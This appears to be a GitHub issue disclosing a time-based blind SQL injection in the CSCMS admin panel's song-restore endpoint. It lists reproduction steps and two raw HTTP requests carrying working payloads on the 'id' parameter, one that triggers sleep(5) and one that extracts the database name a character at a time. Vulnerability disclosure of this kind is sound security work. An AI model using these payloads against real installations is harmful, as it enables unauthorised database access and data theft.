Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add a song after administrator login
Add songs first and then delete them into the trash
When restoring songs in the recycle bin, construct malicious statements and implement sql injection
GET /admin.php/dance/admin/dance/hy?id=10)and(sleep(5))--+ HTTP/1.1 Host: cscms.test Accept: application/json, text/javascript, */*; q=0.01 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 X-Requested-With: XMLHttpRequest Referer: http://cscms.test/admin.php/dance/admin/dance?yid=3 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=r3kc74ivbu10hbssd9s03lqd0n1mu0g6 Connection: close
The parameter "id" exists time blind, sleeps for 5 seconds
construct payload
GET /admin.php/dance/admin/dance/hy?id=10)and(if(substr((select+database()),1,1)='c',sleep(5),1)--+ HTTP/1.1 Host: cscms.test Accept: application/json, text/javascript, */*; q=0.01 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 X-Requested-With: XMLHttpRequest Referer: http://cscms.test/admin.php/dance/admin/dance?yid=3 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=r3kc74ivbu10hbssd9s03lqd0n1mu0g6 Connection: close
In the figure below, you can see that the first letter of the database is "c", so it sleeps for 5 seconds to verify that the injection exists
The text was updated successfully, but these errors were encountered:
No branches or pull requests
There is a SQL blind injection vulnerability in dance_Dance.php_hy
Details
Add a song after administrator login

Add songs first and then delete them into the trash
When restoring songs in the recycle bin, construct malicious statements and implement sql injection
The parameter "id" exists time blind, sleeps for 5 seconds
construct payload
In the figure below, you can see that the first letter of the database is "c", so it sleeps for 5 seconds to verify that the injection exists
The text was updated successfully, but these errors were encountered: